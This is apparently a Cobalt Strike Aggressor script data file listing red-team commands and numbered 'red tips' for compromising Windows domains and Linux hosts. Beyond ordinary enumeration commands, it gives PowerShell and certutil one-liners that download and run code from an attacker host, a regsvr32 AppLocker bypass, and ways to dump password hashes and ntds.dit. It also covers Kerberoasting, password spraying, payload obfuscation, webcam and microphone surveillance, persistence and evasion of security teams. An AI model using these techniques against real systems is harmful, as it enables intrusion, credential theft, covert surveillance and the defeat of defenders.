# defs.cna
# Definitions for all the tips and commands.
# Mostly r3dqu1nn's work, with a bit of help from 001SPARTaN
# @database = @(%(cmd => $cmd, desc => $desc, tags => @tags), %(cmd => $cmd, desc => $desc, tags => @tags), ...)
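# Each entry is a hash with exactly three keys:
#   cmd  - the command text
#   desc - a one-line description of what it does
#   tags - a list of keyword strings (no empty entries, no trailing commas,
#          which otherwise risk a stray null element in the list)
# Every cmd/desc pair is listed once. 'arp -a' appears in both the Windows
# and the Linux sections with different descriptions and tags.
@database = @(
    # Windows built-ins (cmd.exe / wmic)
    %(cmd => 'ipconfig /all', desc => 'Display all network information for all interfaces.', tags => @(
        'network', 'networking', 'interfaces', 'utility', 'recon', 'enum', 'ipconfig'
    )),
    %(cmd => 'systeminfo', desc => 'Display info about the system. Tip: Use | findstr to pipe out individual options.', tags => @(
        'system', 'info', 'information', 'recon', 'enum', 'privesc', 'systeminfo', 'system info'
    )),
    %(cmd => 'route print', desc => 'Display network routes.', tags => @(
        'network', 'route', 'routes', 'print', 'recon', 'enum'
    )),
    %(cmd => 'arp -a', desc => 'Display ARP table.', tags => @(
        'network', 'arp', 'recon', 'enum'
    )),
    %(cmd => 'wmic computersystem get [options]', desc => 'Get detailed information about the system with wmic. Use [/?] for a complete list of options', tags => @(
        'computer', 'wmic', 'system', 'recon', 'enum'
    )),
    %(cmd => 'wmic desktop get [options]', desc => 'Get detailed information about the desktop with wmic. Use [/?] for a complete list of options', tags => @(
        'desktop', 'recon', 'enum', 'wmic'
    )),
    %(cmd => 'wmic netlogin get [options]', desc => 'Get detailed information about netlogin with wmic. Use [/?] for a complete list of options', tags => @(
        'netlogin', 'login', 'recon', 'enum', 'wmic'
    )),
    %(cmd => 'wmic process get [options]', desc => 'Get detailed information about processes with wmic. Use [/?] for a complete list of options', tags => @(
        'process', 'processes', 'recon', 'enum', 'wmic'
    )),
    %(cmd => 'wmic service get [options]', desc => 'Get detailed information about services with wmic. Use [/?] for a complete list of options', tags => @(
        'services', 'service', 'recon', 'enum', 'wmic'
    )),
    %(cmd => 'wmic volume get [options]', desc => 'Get detailed information about volumes/drives with wmic. Use [/?] for a complete list of options', tags => @(
        'volume', 'drives', 'recon', 'enum', 'wmic'
    )),
    %(cmd => 'wmic netuse list full', desc => 'Get a full list of mapped drives with wmic.', tags => @(
        'netuse', 'drives', 'recon', 'enum', 'wmic', 'mapped'
    )),
    %(cmd => 'wmic startup get [options]', desc => 'Get detailed information regarding the startup of the system with wmic. Use [/?] for a complete list of options.', tags => @(
        'startup', 'boot', 'bootup', 'enum', 'recon', 'wmic'
    )),
    %(cmd => 'wmic PRODUCT get [options]', desc => 'Get detailed information about the installed software on the system with wmic. Use [/?] for a complete list of options.', tags => @(
        'product', 'software', 'install', 'enum', 'recon', 'wmic'
    )),
    %(cmd => 'wmic qfe get [options]', desc => 'Get detailed information about hotfixes installed on the system with wmic. Use [/?] for a complete list of options.', tags => @(
        'qfe', 'patches', 'hotfix', 'enum', 'recon', 'kb', 'wmic'
    )),
    %(cmd => 'wmic ntdomain get [options]', desc => 'Get detailed information about the Domain Controller on the network with wmic. Use [/?] for a complete list of options.', tags => @(
        'ntdomain', 'DomainController', 'domain', 'dc', 'enum', 'recon', 'wmic'
    )),
    %(cmd => 'wmic bios list full', desc => 'Get detailed information about the BIOS on the system with wmic.', tags => @(
        'computer', 'hardware', 'bios', 'install', 'enum', 'recon', 'wmic'
    )),
    %(cmd => 'SET', desc => 'Get detailed information about all the %PATH% variables.', tags => @(
        'computer', 'variables', 'set', 'enum', 'recon', 'user'
    )),
    %(cmd => 'netstat -ano', desc => 'Get detailed information about network connections on the system. Use netstat [/?] for a complete list of options.', tags => @(
        'computer', 'netstat', 'network', 'status', 'enum', 'recon', 'connections'
    )),
    %(cmd => 'netstat -ano | findstr /I listening', desc => 'Get detailed information about network connections listening on the system. Use netstat [/?] for a complete list of options.', tags => @(
        'computer', 'netstat', 'network', 'status', 'enum', 'recon', 'connections'
    )),
    %(cmd => 'netstat -ano | findstr /I established', desc => 'Get detailed information about network connections established on the system. Use netstat [/?] for a complete list of options.', tags => @(
        'computer', 'netstat', 'network', 'status', 'enum', 'recon', 'connections'
    )),
    %(cmd => 'nbtstat -A [Target IP]', desc => 'Returns the NetBIOS name table and MAC address of the address card for the remote computer name specified.', tags => @(
        'computer', 'nbtstat', 'network', 'mac', 'enum', 'recon', 'NetBIOS'
    )),
    %(cmd => 'nslookup', desc => 'Displays information that you can use to diagnose Domain Name System (DNS) infrastructure. Resolve IP <--> Domain Name.', tags => @(
        'computer', 'nslookup', 'network', 'dns', 'lookup', 'enum', 'recon'
    )),
    %(cmd => 'reg query [keyname]', desc => 'Returns a list of the next tier of subkeys and entries that are located under a specified subkey in the registry.', tags => @(
        'registry', 'query', 'reghive', 'regedit', 'enum', 'recon'
    )),
    %(cmd => 'reg add [keyname] [options]', desc => 'Adds a new subkey or entry to the registry.', tags => @(
        'registry', 'add', 'reghive', 'regedit', 'enum', 'recon'
    )),
    # listed once; a second identical schtasks entry used to follow driverquery
    %(cmd => 'schtasks [options]', desc => 'Schedules commands and programs to run periodically or at a specific time. Adds and removes tasks from the schedule, starts and stops tasks on demand, and displays and changes scheduled tasks.', tags => @(
        'schtasks', 'schedule', 'time', 'persistence', 'enum', 'recon', 'tasks'
    )),
    %(cmd => 'sc [options]', desc => 'Communicates with the Service Controller and installed services. SC.exe retrieves and sets control information about services.', tags => @(
        'sc', 'service', 'controller', 'enum', 'recon', 'tasks'
    )),
    %(cmd => 'sc [ServerName] qc [ServiceName] [BufferSize]', desc => 'Queries the configuration information for a service.', tags => @(
        'sc', 'qc', 'service', 'controller', 'enum', 'recon', 'tasks'
    )),
    %(cmd => 'tasklist (/S Remote Computer) [options]', desc => 'Displays a list of applications and services with their Process ID (PID) for all tasks running on either a local or a remote computer.', tags => @(
        'schtasks', 'list', 'time', 'persistence', 'enum', 'recon', 'tasklist', 'processes', 'process'
    )),
    %(cmd => 'driverquery [/s Computer] [/u Domain\User /p Password]', desc => 'Displays a list of all installed device drivers and their properties.', tags => @(
        'driver', 'driverquery', 'computer', 'hardware', 'enum', 'recon'
    )),
    %(cmd => 'gpresult /s <COMPUTER> /u <USERNAME> [options]', desc => 'Displays the Resultant Set of Policy (RSoP) information for a remote user and computer.', tags => @(
        'firewall', 'RSOP', 'GPO', 'Group Policy', 'enum', 'recon', 'rules'
    )),
    %(cmd => 'whoami /groups /all [options]', desc => 'Displays user, group and privileges information for the user who is currently logged on to the local system. If used without parameters, whoami displays the current domain and user name.', tags => @(
        'user', 'groups', 'privileges', 'logon', 'enum', 'recon'
    )),
    %(cmd => 'netsh firewall (advfirewall) show conf', desc => 'Netsh is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a currently running computer. Use firewall to query firewall information.', tags => @(
        'netsh', 'network', 'config', 'firewall', 'enum', 'recon', 'rules'
    )),
    %(cmd => 'netsh wlan show profiles', desc => 'Netsh is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a currently running computer.', tags => @(
        'netsh', 'network', 'config', 'wlan', 'enum', 'recon', 'rules'
    )),
    #net commands
    %(cmd => 'net accounts [/domain]', desc => 'Updates the user accounts database and modifies password and logon requirements for all accounts.', tags => @(
        'net', 'network', 'config', 'accounts', 'enum', 'recon', 'user', 'modify', 'domain', 'display'
    )),
    %(cmd => 'net group "groupname" [/domain]', desc => 'Adds, displays, or modifies global groups in the domain.', tags => @(
        'net', 'network', 'config', 'groups', 'recon', 'enum', 'domain', 'display'
    )),
    %(cmd => 'net localgroup "groupname" [/domain]', desc => 'Adds, displays, or modifies local groups in the domain.', tags => @(
        'net', 'network', 'config', 'localgroup', 'enum', 'recon', 'domain', 'display'
    )),
    %(cmd => 'net view [/domain]', desc => 'Displays a list of domains, computers, or resources that are being shared by the specified computer. Used without parameters, net view displays a list of computers in your current domain.', tags => @(
        'net', 'network', 'config', 'view', 'enum', 'recon', 'display', 'computers', 'domain'
    )),
    %(cmd => 'net session [\\ComputerName]', desc => 'Manages server computer connections. Used without parameters, net session displays information about all sessions with the local computer.', tags => @(
        'net', 'network', 'config', 'session', 'enum', 'recon', 'display'
    )),
    %(cmd => 'net share [options]', desc => 'Manages shared resources. Used without parameters, net share displays information about all of the resources that are shared on the local computer.', tags => @(
        'net', 'network', 'config', 'resources', 'enum', 'recon', 'share', 'display'
    )),
    %(cmd => 'net user [username] [/domain]', desc => 'Adds or modifies user accounts or displays user account information.', tags => @(
        'net', 'network', 'config', 'user', 'enum', 'recon', 'domain', 'display'
    )),
    %(cmd => 'net use * \\IP\Share /user:username [password]', desc => 'Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections. The command also controls persistent net connections. Used without parameters, net use retrieves a list of network connections.', tags => @(
        'net', 'network', 'use', 'pivot', 'authentication', 'resource', 'domain', 'connection', 'shared'
    )),
    #powershell
    %(cmd => 'IEX (New-Object Net.WebClient).DownloadString(\'http://IP/URI\')', desc => 'The Invoke-Expression cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command.', tags => @(
        'IEX', 'one-liner', 'Invoke-Expression', 'powershell', 'enum', 'recon', 'cmdlet', 'download'
    )),
    %(cmd => 'powershell -executionpolicy bypass -nop -noni -c \'\'\'[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {1};IEX (New-Object Net.WebClient).DownloadString(\"https://IP/URI\")\'\'\'', desc => 'The Invoke-Expression cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command.', tags => @(
        'IEX', 'one-liner', 'Invoke-Expression', 'powershell', 'enum', 'recon', 'cmdlet', 'download', 'SSL'
    )),
    %(cmd => '\$code=\'code goes here\'\;[convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(\$code\)\)', desc => 'Encodes a byte array as a Base64 string', tags => @(
        'string', 'base64', 'encode', 'powershell', 'obfuscation', 'Unicode', 'Byte'
    )),
    %(cmd => '\$code=\'code goes here\'\;[convert]::FromBase64String([Text.Encoding]::Unicode.GetBytes(\$code\)\)', desc => 'Decodes a byte array from a Base64 string', tags => @(
        'string', 'base64', 'decode', 'powershell', 'obfuscation', 'Unicode', 'Byte'
    )),
    %(cmd => 'cat (Get-PSReadlineOption).HistorySavePath', desc => 'Shows all history for PS5 commands entered', tags => @(
        'recon', 'stored', 'powershell', 'enum', 'history', 'commands'
    )),
    %(cmd => 'Get-ADUser -Filter \* \|Where-Object \{\$_.Enabled -eq $false\}', desc => 'Returns all disabled user accounts', tags => @(
        'recon', 'AD', 'powershell', 'enum', 'disabled', 'accounts', 'user'
    )),
    %(cmd => 'Get-ADUser -Enabled -PasswordNeverExpires:$true', desc => 'Returns all accounts with non-expiring passwords', tags => @(
        'recon', 'AD', 'powershell', 'enum', 'expire', 'accounts', 'user'
    )),
    %(cmd => 'Get-ADUser -Filter \{SmartCardLogonRequired -eq $false\}', desc => 'Returns all accounts with no smart card required', tags => @(
        'recon', 'AD', 'powershell', 'enum', 'smartcard', 'accounts', 'user', 'CAC'
    )),
    %(cmd => 'Get-ADComputer -Filter \{OperatingSystem -Like \"Windows *Server*\"\} -Property * | Format-Table Name,OperatingSystem,OperatingSystemServicePack -Wrap -Auto', desc => 'Returns all AD Computers in a format-table', tags => @(
        'recon', 'AD', 'powershell', 'enum', 'computer', 'windows server', 'OS', 'Server'
    )),
    %(cmd => '(new-object Net.Sockets.TcpClient).Connect("IP", PORT)', desc => 'Tests network port access to see if the port is open', tags => @(
        'recon', 'tcp', 'powershell', 'enum', 'computer', 'sockets', 'IP', 'Port', 'network'
    )),
    %(cmd => '[System.Net.Dns]::GetHostbyAddress("8.8.8.8")', desc => 'Resolve IP to hostname', tags => @(
        'recon', 'powershell', 'net', 'hostname', 'IP', 'dns', 'network'
    )),
    %(cmd => '[System.Net.Dns]::GetHostEntry("host.domain")', desc => 'Resolve hostname to IP', tags => @(
        'recon', 'powershell', 'net', 'dns', 'IP', 'hostname', 'network'
    )),
    #dsquery
    %(cmd => 'dsquery computer -name <name>*', desc => 'Search for computers with a name similar to <name>.', tags => @(
        'computer', 'name', 'dsquery', 'recon', 'enum'
    )),
    %(cmd => 'dsquery * \"CN=System,DC=computer\" -filter \"\(objectClass=trustedDomain\)\" -attr TrustPartner,FlatName,TrustDirection', desc => 'Search for Domain Controllers that are trusted and have Trust relationships within the domain', tags => @(
        'computer', 'dsquery', 'recon', 'enum', 'domain controller', 'domain', 'trust'
    )),
    %(cmd => 'dsquery group -name \"domain admins\" |dsget group -members -expand', desc => 'Search for Domain Admins in the domain using dsquery', tags => @(
        'members', 'dsquery', 'recon', 'enum', 'groups', 'domain', 'admins'
    )),
    %(cmd => 'dsquery user -name <username> |dsget user -memberof -expand', desc => 'Query a specific user in the domain and the groups they are a member of using dsquery', tags => @(
        'members', 'dsquery', 'recon', 'enum', 'groups', 'domain', 'user'
    )),
    %(cmd => 'dsquery * domainroot -filter \"\(&\(objectCategory=Person\)\(objectClass=User\)\(userAccountControl:1.2.840.113556.1.4.803:=32\)\)\"', desc => 'Query user accounts with no passwords required with dsquery', tags => @(
        'accounts', 'dsquery', 'recon', 'enum', 'passwords', 'domain'
    )),
    %(cmd => 'dsquery subnet -limit 0', desc => 'Returns subnet information in AD sites and services with dsquery', tags => @(
        'subnet', 'dsquery', 'recon', 'enum', 'AD', 'sites', 'services'
    )),
    %(cmd => 'dsquery OU', desc => 'Returns all OU information in AD with dsquery', tags => @(
        'subnet', 'dsquery', 'recon', 'enum', 'AD', 'OU'
    )),
    #MSSQL
    %(cmd => 'sqlcmd -s localhost -q "exec sp_databases"', desc => 'Returns list of local MSSQL databases', tags => @(
        'sql', 'mssql', 'enum', 'recon', 'database', 'sqlcmd'
    )),
    %(cmd => 'sqlcmd -s localhost -d DATABASE -q "SELECT count(*) FROM TABLE"', desc => 'Returns number of entries in TABLE', tags => @(
        'sql', 'mssql', 'enum', 'recon', 'database', 'sqlcmd'
    )),
    %(cmd => 'sqlcmd -s localhost -d DATABASE -q "SELECT TOP 10 * FROM TABLE"', desc => 'Returns top 10 rows from TABLE', tags => @(
        'sql', 'mssql', 'enum', 'recon', 'database', 'sqlcmd'
    )),
    %(cmd => 'sqlcmd -s localhost -d DATABASE -q "SELECT * FROM SYSOBJECTS WHERE TYPE = \'U\' ORDER BY NAME"', desc => 'Returns list of table names in DATABASE', tags => @(
        'sql', 'mssql', 'enum', 'recon', 'database', 'sqlcmd'
    )),
    #Linux
    %(cmd => 'cat /etc/issue', desc => 'Verify Linux distro', tags => @(
        'linux', 'etc', 'issue', 'cat', 'distro'
    )),
    %(cmd => 'cat /etc/*-release', desc => 'Verify exact version and distribution for Linux', tags => @(
        'linux', 'cat', 'etc', 'release', 'version', 'distro'
    )),
    %(cmd => 'cat /etc/*-release | grep -E \'\"NAME=\"|ID|VERSION|ID_LIKE\'', desc => 'Verify exact version and distribution for Linux', tags => @(
        'linux', 'cat', 'etc', 'release', 'version', 'distro'
    )),
    %(cmd => 'cat /proc/version', desc => 'Verify Linux version using proc', tags => @(
        'linux', 'cat', 'proc', 'version', 'distro'
    )),
    %(cmd => 'rpm -q kernel', desc => 'Get detailed information about the kernel', tags => @(
        'linux', 'rpm', 'kernel'
    )),
    %(cmd => 'dmesg | grep Linux', desc => 'Output kernel messages for Linux', tags => @(
        'linux', 'dmesg', 'grep', 'kernel'
    )),
    %(cmd => 'ls /boot | grep vmlinuz-', desc => 'Verify the name of the specific version of the kernel', tags => @(
        'linux', 'ls', 'grep', 'vmlinuz-', 'kernel'
    )),
    # desc typo fixed ("distrobution" -> "distribution")
    %(cmd => 'lsb_release -a', desc => 'Display information about your specific Linux distribution', tags => @(
        'linux', 'lsb_release', 'LSB', 'distro'
    )),
    %(cmd => 'last -a', desc => 'Show the users who logged in last', tags => @(
        'linux', 'last', 'login', 'log'
    )),
    %(cmd => 'uname -a/-mrs', desc => 'Display the software and hardware information in current running Linux system', tags => @(
        'linux', 'uname', 'software', 'hardware', 'system'
    )),
    %(cmd => 'id', desc => 'Print user and group information for the specified USERNAME, or (when USERNAME omitted) for the current user', tags => @(
        'linux', 'id', 'user', 'group', 'username'
    )),
    %(cmd => 'history', desc => 'Show the last commands entered for the current user', tags => @(
        'linux', 'history', 'last', 'commands', 'user'
    )),
    %(cmd => 'arp -a', desc => 'Display the current arp table', tags => @(
        'linux', 'arp', 'table', 'MAC'
    )),
    %(cmd => 'netstat -anot', desc => 'Display network connections', tags => @(
        'linux', 'net', 'stat', 'TCP', 'UDP', 'connections'
    )),
    %(cmd => 'ps -elf', desc => 'View information on a selection of running processes', tags => @(
        'linux', 'ps', 'elf', 'processes', 'monitor', 'status'
    )),
    %(cmd => 'ps -elf | grep root', desc => 'View information on a selection of running processes owned by root', tags => @(
        'linux', 'ps', 'elf', 'root', 'processes', 'monitor'
    )),
    %(cmd => 'ls -la /var/www/html/', desc => 'List the contents of html directory for web resources', tags => @(
        'linux', 'ls', '/var/www/html', 'web', 'html', 'listing'
    )),
    %(cmd => 'service apache2 status', desc => 'View status of apache2 service', tags => @(
        'linux', 'apache2', 'service', 'status', 'web'
    )),
    %(cmd => 'cat /etc/resolv.conf', desc => 'View the DNS entries for your Linux distro', tags => @(
        'linux', 'cat', 'etc', 'resolv.conf', 'DNS', 'distro'
    )),
    %(cmd => 'cat /etc/networks', desc => 'View Linux network configuration', tags => @(
        'linux', 'cat', 'etc', 'networks', 'config'
    )),
    %(cmd => 'iptables -L', desc => 'Display all iptables rules', tags => @(
        'linux', 'iptables', 'networking', 'rules', 'ACL'
    )),
    %(cmd => 'iptables -L -t nat', desc => 'Display all natting iptables rules', tags => @(
        'linux', 'iptables', 'nat', 'rules', 'ACL'
    )),
    %(cmd => 'lsof -i', desc => 'List the files that are open by which process', tags => @(
        'linux', 'lsof', 'list', 'files', 'process', 'open'
    )),
    %(cmd => 'cat /etc/services', desc => 'View services that client applications use', tags => @(
        'linux', 'cat', 'etc', 'services', 'client', 'applications'
    )),
    %(cmd => 'grep 80 /etc/services', desc => 'View services that utilize port 80', tags => @(
        'linux', 'grep', '80', 'web', 'services', 'port'
    )),
    %(cmd => 'w', desc => 'Display who is logged into the Linux and Unix-like server, and what they are doing at command execution time', tags => @(
        'linux', 'w', 'logged', 'login', 'command', 'execution'
    )),
    %(cmd => 'route -n', desc => 'Display the route table for Linux/Debian based systems', tags => @(
        'linux', 'route', '-n', 'routing', 'network', 'recon'
    )),
    %(cmd => 'cat /etc/passwd', desc => 'Display the contents of /etc/passwd', tags => @(
        'linux', 'cat', 'etc', 'passwd', 'password', 'recon'
    )),
    %(cmd => 'cat /etc/passwd | awk -F : \'{if (\$3 > 999 && \$3 < 60001) print \$1,\$3,\$6}\'', desc => 'Display only users of /etc/passwd', tags => @(
        'linux', 'cat', 'etc', 'passwd', 'awk', 'regex', 'password', 'recon'
    )),
    %(cmd => 'cat /etc/motd', desc => 'Display the message of the day for any sensitive info', tags => @(
        'linux', 'cat', 'etc', 'motd', 'information', 'recon'
    )),
    %(cmd => 'cat /etc/group', desc => 'Display the groups in /etc/group', tags => @(
        'linux', 'cat', 'etc', 'group', 'recon'
    )),
    %(cmd => 'cat /etc/shadow', desc => 'Display the password hashes (Must be root)', tags => @(
        'linux', 'cat', 'etc', 'shadow', 'password', 'hashes', 'recon'
    ))
);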
@tips = @(
%(tips => 'Use the built in net commands with Beacon! [help net]', tags => @(
'net', 'networking', 'config', 'utility', 'recon', 'enum', 'domain', 'display'
)
),
%(tips => 'Run C:\\Windows\\System32\\gatherNetworkInfo.vbs script and check results inside C:\\Windows\\System32\\Config', tags => @(
'vbscript', 'networking', 'config', 'utility', 'recon', 'enum', 'script'
)
),
%(tips => 'RunDll32.exe user32.dll,LockWorkStation - Locks a users workstation', tags => @(
'rundll32', 'lock', 'workstation', 'user', 'effects'
)
),
%(tips => 'dir /s /h:a *.* - displays all hidden files', tags => @(
'dir', 'display', 'hidden', 'files', 'listing'
)
),
%(tips => 'netsh interface portproxy add v4tov4 listenport=port listenaddress=IP connectaddress=remote_ip connectport=remote_port - setup reverse port proxy on windows as a pivot', tags => @(
'netsh', 'portproxy', 'pivot', 'networking', 'interface'
)
),
%(tips => 'icacls \<file_name\> /grant \<username\>:F - grants full control permissions', tags => @(
'icacls', 'permissions', '', 'user', 'effects'
)
),
%(tips => 'regsvr32.exe /u /n /s /i:http://ip/payload.sct scrobj.dll - bypass Applocker or code execution restrictions, using regsvr32 as a one-liner', tags => @(
'regsvr32', 'one-liner', 'scrobj.dll', 'bypass', 'native', 'delivery'
)
),
%(tips => 'SystemInfo /s computername - gets remote system info', tags => @(
'systeminfo', 'computer', 'system', 'recon', 'info', 'enum'
)
),
%(tips => 'Need a map of the network? Run Bloodhound or SharpHound for faster polling!!', tags => @(
'network', 'map', 'topology', 'BloodHound', 'SharpHound'
)
),
%(tips => 'Always check sysvols!! Domain Controllers will have them, most sysvols are viewable by normal users.', tags => @(
'sysvol', 'domain controller', 'enum', 'recon', 'scripts', 'share'
)
),
%(tips => 'net user a specific user and see if they are executing any logon scripts, those might contain juicy information.', tags => @(
'net', 'user', 'recon', 'enum', 'logon', 'scripts'
)
),
%(tips => 'Always check Desktops/Documents/Downloads/Favorites folders for trails of valuable information left behind.', tags => @(
'folders', 'information', 'recon', 'enum', 'users'
)
),
%(tips => 'Find those Fileservers! Sysadmins leave behind all kinds of goodies there. Great for lateral movement as well.', tags => @(
'server', 'fileserver', 'sysadmin', 'lateral movement', 'enum', 'recon'
)
),
%(tips => 'Use certutil.exe -urlcache -split -f [http://AttackerIP/RemoteFile] to download a file to the target machine.', tags => @(
'certutil', 'urlcache', 'one-liner', 'download', 'web', 'delivery'
)
),
%(tips => 'The all powerful one-liner powershell.exe -w hidden -nop -ep bypass -c \"IEX ((new-object net.webclient).downloadstring(\'http://[domainname|IP]:[port]/[file]\'))\"', tags => @(
'powershell', 'one-liner', 'web-delivery', 'web', 'delivery', 'download'
)
),
%(tips => 'Use tasklist /S [RemoteComputer] /SVC to see if you have access to that remote machine.', tags => @(
'tasklist', 'remote', 'authentication', 'list', 'processes'
)
),
%(tips => 'Enable RDP through the registry: reg add “HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f', tags => @(
'RDP', 'registry', 'config', 'windows', 'regedit'
)
),
%(tips => 'Please wrap/encode/pack your payloads if you have to drop to disk! - use veil/upx/Invoke-Obfuscation/In-Memory type of payloads', tags => @(
'pack', 'wrap', 'encode', 'upx', 'veil', 'payload', 'Invoke-Obfuscation'
)
),
%(tips => 'Try to stay in memory and avoid putting files on disk. (powershell-import)', tags => @(
'Memory', 'inject', 'fileless', 'payload', 'files'
)
),
%(tips => 'Live off the land!! Use what is on the target, native windows binaries are very powerful! (ex. forfiles, rundll32)', tags => @(
'native', 'windows', 'binaries', '', 'processes'
)
),
%(tips => 'Use AD naming schemes to your advantage, sysadmins are lazy and use organization to help them with all the IT work they do on a daily basis.', tags => @(
'AD', 'schemes', 'sysadmins', 'IT', 'naming'
)
),
%(tips => 'Enterprise Admins will almost always have the rights to move laterally to those foreign domain controllers, 9 times out of 10 they use the same password!', tags => @(
'admins', 'enterprise', 'AD', 'password', 'lateral movement', 'pivot'
)
),
%(tips => 'Invoke-NinjaCopy.ps1 is super powerful and should be used to grab the ntds.dit and SYSTEM files for offline cracking.', tags => @(
'Invoke-NinjaCopy', 'powershell', 'ntds.dit', 'SYSTEM', 'password', 'cracking'
)
),
%(tips => 'Have multiple points of presence on a network for longer engagements. Persistence can go a long way for Security Operations.', tags => @(
'persistence', 'presence', 'foothold', 'network', 'operations', 'security'
)
),
%(tips => 'cmd.exe and powershell.exe blocked by GPO? Find a process that is user owned and started on bootup for process injection to bypass that. Try forfiles as well.', tags => @(
'cmd', 'powershell', 'GPO', 'list', 'injection', 'forfiles', 'bypass'
)
),
%(tips => 'Just because you acquired initial access does not mean you stop doing recon. Network/Host Enumeration is always the most important part.', tags => @(
'initial', 'recon', 'enum', 'network', 'host', 'harvesting'
)
),
%(tips => 'Invoke-ReverseDnsLookup.ps1 of powersploit finds those machines on the network that has DNS records and can provide more SA for an attacker.', tags => @(
'powershell', 'powersploit', 'network', 'machine', 'DNS', 'awareness', 'recon', 'enum'
)
),
%(tips => 'Need a Temporary web server? Use Python! python -m SimpleHTTPServer [port]', tags => @(
'web', 'server', 'python', 'http', 'services'
)
),
%(tips => 'Red Tip #1: Profile your victim and use their user agent to mask your traffic. Alternatively use UA from software such as Outlook.', tags => @(
'redtip', '#1', 'user agent', 'outlook', 'traffic'
)
),
%(tips => 'Red tip #2: If the enemy SOC is using proxy logs for analysis. Guess what? It wont log cookies or POST body content as can be sensitive.', tags => @(
'redtip', '#2', 'SOC', 'proxy', 'analysis', 'logs', 'cookies'
)
),
%(tips => 'Red tip #3: Taking a snapshot of AD can let you browse, explore and formulate future attacks if access is lost momentarily.', tags => @(
'redtip', '#3', 'snapshot', 'AD', 'attacks'
)
),
%(tips => 'Red tip #4: consider using Office Template macros and replacing normal.dot for persistence in VDI environments.', tags => @(
'redtip', '#4', 'Office', 'macros', 'persistence', 'VDI'
)
),
%(tips => 'Red tip #5: Do a DNS lookup for terms such as intranet, sharepoint, wiki, nessus, cyberark and many others to start intel on your target.', tags => @(
'redtip', '#5', 'DNS', 'recon', 'enum'
)
),
%(tips => 'Red tip #6: Got access but need to find target? Use WMIC to query and dump the DNS Zone for a better view of assets - https://serverfault.com/questions/550385/export-all-hosts-from-dns-manager-using-powershell', tags => @(
'redtip', '#6', 'wmic', 'DNS', 'assets'
)
),
%(tips => 'Red tip #7: Whether PSEXEC, WMI, PS remoting or even the recent COM execution technique for lateral movement. Dont forget beloved RDP.', tags => @(
'redtip', '#7', 'PSEXEC', 'WMI', 'powershell', 'COM', 'RDP'
)
),
%(tips => 'Red tip #8: Make sure theres trackers in your: emails, delivery server and payload execution. Any more? Comment to share!', tags => @(
'redtip', '#8', 'emails', 'delivery', 'payload'
)
),
%(tips => 'Red tip #9: When PowerUp yields no results, dont forget SysInternals AutoRuns. Often you can find unexpected surprises :)', tags => @(
'redtip', '#9', 'PowerUp', 'sysinternals', 'AutoRuns'
)
),
%(tips => 'Red tip #10: When using BloodHound, dont forget DA equivalents such as administrators and server operators etc too. These arent mapped.', tags => @(
'redtip', '#10', 'BloodHound', 'DA', 'groups', 'mapping'
)
),
%(tips => 'Red tip #11: When navigating mature environments, a good old network diagram along with AD OUs can help to shed some light into next steps.', tags => @(
'redtip', '#11', 'topology', 'network', 'AD', 'OU', 'lateral movement'
)
),
%(tips => 'Red tip #12: Kerberoast them hashes, could be a fast route to domain administrator. PowerView: Invoke-Kerberoast -Format Hashcat', tags => @(
'redtip', '#12', 'Kerberoast', 'hashes', 'services', 'powershell', 'DA'
)
),
%(tips => 'Red tip #13: Shared local administrator account hashes are great for lateral movement. Find machines based on the same build and attack away', tags => @(
'redtip', '#13', 'administrator', 'account', 'hashes', 'lateral movement', 'machines'
)
),
%(tips => 'Red tip #14: Got extra credentials? Use different sets for separate egress channels so that if one account is disabled all the rest are ok.', tags => @(
'redtip', '#14', 'credentials', 'egress', 'channels', 'account'
)
),
%(tips => 'Red tip #15: You dont need payloads when you can phish credentials and login to Citrix, VPN, email with no 2FA. Check the perimeter.', tags => @(
'redtip', '#15', 'phish', 'payload', 'Citrix', 'VPN', 'email'
)
),
%(tips => 'Red tip #16: @dafthack MailSniper, @domchell LyncSniper can be a useful but noisy way to obtain AD credentials into an organization.', tags => @(
'redtip', '#16', 'AD', 'credentials', 'organization'
)
),
%(tips => 'Red tip #17: @_staaldraad Ruler tool can be used to obtain code execution on a system running Outlook if you can access exchange externally', tags => @(
'redtip', '#17', 'Ruler', 'Outlook', 'code', 'execution', 'exchange'
)
),
%(tips => 'Red tip #18: When tools like MailSniper dont work in custom environments, you still have good old @Burp_Suite to replicate the attacks', tags => @(
'redtip', '#18', 'burpsuite', 'burp', 'MailSniper'
)
),
%(tips => 'Red tip #19: Need a DC? echo %LOGONSERVER%. Need a list? nltest /dclist, nslookup -q=srv _kerberos._tcp (domain suffix can autocomplete)', tags => @(
'redtip', '#19', 'DC', 'LOGONSERVER', 'nltest', 'nslookup', 'kerberos'
)
),
%(tips => 'Red tip #20: So apparently not many people use SSH for redirector setup. So try out SSH c2 -R *:80:localhost:80. SSH config GatewayPorts yes', tags => @(
'redtip', '#20', 'SSH', 'redirector', 'c2', 'config'
)
),
%(tips => 'Red tip #21: Found open user home shares that are accessible? See if you can drop into Startup Programs for lateral movement and privesc.', tags => @(
'redtip', '#21', 'shares', 'user', 'startup', 'privesc', 'lateral movement'
)
),
%(tips => 'Red tip #22: Use VNC, microphone and webcam to perform surveillance. Netstat, tasklist can provide context into what the users doing.', tags => @(
'redtip', '#22', 'VNC', 'microphone', 'webcam', 'netstat', 'tasklist'
)
),
%(tips => 'Red tip #23: Stash payloads in C:$Recycle.Bin', tags => @(
'redtip', '#23', 'payload', 'C:', 'Recycle Bin'
)
),
%(tips => 'Red tip #24: Compromise the SOC and Security teams to watch their progress and track their email alerts for sophisticated threats', tags => @(
'redtip', '#24', 'SOC', 'Security', 'email', 'phish', 'alerts'
)
),
%(tips => 'Red tip #25: Probably dont do this on a red team, but spray for Welcome1, Password1 if youre struggling to move. But move off fast.', tags => @(
'redtip', '#25', 'password', 'spray', 'cracking'
)
),
%(tips => 'Red tip #26: Split your campaigns up so that they are independent. Fire tons at once for decoys and to burn out the defense.', tags => @(
'redtip', '#26', 'campaign', 'fire', 'defense'
)
),
%(tips => 'Red tip #27: Need more credentials? Search for passwords on Sharepoint, and intranet.', tags => @(
'redtip', '#27', 'credentials', 'password', 'Sharepoint', 'intranet'
)
),
